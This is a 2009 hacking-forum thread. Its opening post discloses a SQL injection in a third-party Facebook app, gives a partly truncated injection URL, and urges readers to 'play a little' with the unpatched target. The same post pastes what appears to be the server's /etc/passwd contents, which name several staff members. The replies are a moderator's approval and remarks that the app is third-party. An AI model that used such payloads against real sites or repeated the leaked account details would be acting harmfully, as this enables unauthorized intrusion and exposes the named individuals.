Facebook SQL Injection

Printable View

September 16th, 2009, 10:48 AM
crim

Facebook SQL Injection

**t34b4g5's Edit, i am allowing this thread to remain, see post below :) ***

I'm not sure if i'm allowed to post this here, if this is against the rules just remove the thread

A team member discovered this a few weeks ago and it still seems to be unpatched

Be my guest and play a little with them, a site big as Facebook should be aware of security, hopefully their box is hardened
***Click at your own Risk***
http://apps.facebook.com/newscloud/?...737764%29,10--
***Click at your own Risk***

Code:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh user:x:1000:1000:user,,,:/home/user:/bin/bash sshd:x:100:65534::/var/run/sshd:/usr/sbin/nologin todd:x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash jeff:x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim:x:102:104::/var/spool/exim4:/bin/false statd:x:103:65534::/var/lib/nfs:/bin/false identd:x:104:65534::/var/run/identd:/bin/false adam:x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash rick:x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash russell:x:1005:1005:Russell Branca,,,:/home/russell:/bin/bash daniel:x:1006:1006:Daniel MacDonald,,,:/home/daniel:/bin/bash postfix:x:105:106::/var/spool/postfix:/bin/false 4
September 16th, 2009, 11:35 AM
t34b4g5

Greetz..

Nice thread, wish there were more type's of threads like this being posted. :)

anyhow i am letting this thread stay. :) Simply because these arn't the freshest POC's floating atm. ;)

So until they are rendered useless don't be silly and get yourself raided by the FBI'z :halo:
September 18th, 2009, 06:18 PM
d34dl0k1

actually, what you've found is a injection in a third party app on Facebook

http://developers.facebook.com/

apps.facebook.com is the domain name, but that's not their data.
September 18th, 2009, 10:44 PM
souleman

Considering what the 3rd party app is (newscloud), it doesn't really surprise me.

If I remember correctly (been a whild since I looked at it), there is a problem with the facebook API that allows any member to post their own information. Instead of setting it up like the members are contributers, it is set up like they are members, so "need" direct access to the database. Even if facebook fixed the problem, I'm sure a lot of developers didn't do it right. You can probably get the same type of results from most apps that allow people to submit their own content on facebook.